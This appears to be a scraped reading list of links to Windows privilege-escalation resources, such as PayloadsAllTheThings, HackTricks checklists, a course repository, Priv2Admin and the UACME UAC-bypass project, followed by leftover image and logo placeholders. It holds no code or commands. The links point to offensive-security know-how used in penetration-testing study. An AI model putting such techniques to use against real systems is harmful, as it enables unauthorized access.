PayloadsAllTheThings/Windows - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThingsGitHub
Windows privesc on PayloadsAllTheThings
Windows Privilege Escalation Guide
Windows privesc on Absolomb
Privilege Escalation - Windows · Total OSCP Guide
Windows privesc Sushant 747
GitHub - TCM-Course-Resources/Windows-Privilege-Escalation-Resources: Compilation of Resources from TCM's Windows Priv Esc Udemy CourseGitHub
Windows-Privilege-Escalation-Resources - TCM Course Resources - Gr1mmie
Checklist - Local Windows Privilege EscalationHackTricks
Windows PrivEsc Checklist - Hacktricks
GitHub - gtworek/Priv2Admin: Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.GitHub
Priv2Admin
Adjusting Token Privileges in PowerShell
ADJUSTING TOKEN PRIVILEGES IN POWERSHELL - LEE HOLMES
Enable All Token PrivilegesMedium
Enable All Token Privileges - Mark Mo
GitHub - hfiref0x/UACME: Defeating Windows User Account ControlGitHub
Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor - hfiref0x
Windows CMD
Logo
image
image
image
image
image
image
image
image
image
image
image
image
image
image
image
image
image
Logo
Logo
Logo
Logo
Logo
Logo
Logo
Logo
image
Logo
Logo
Logo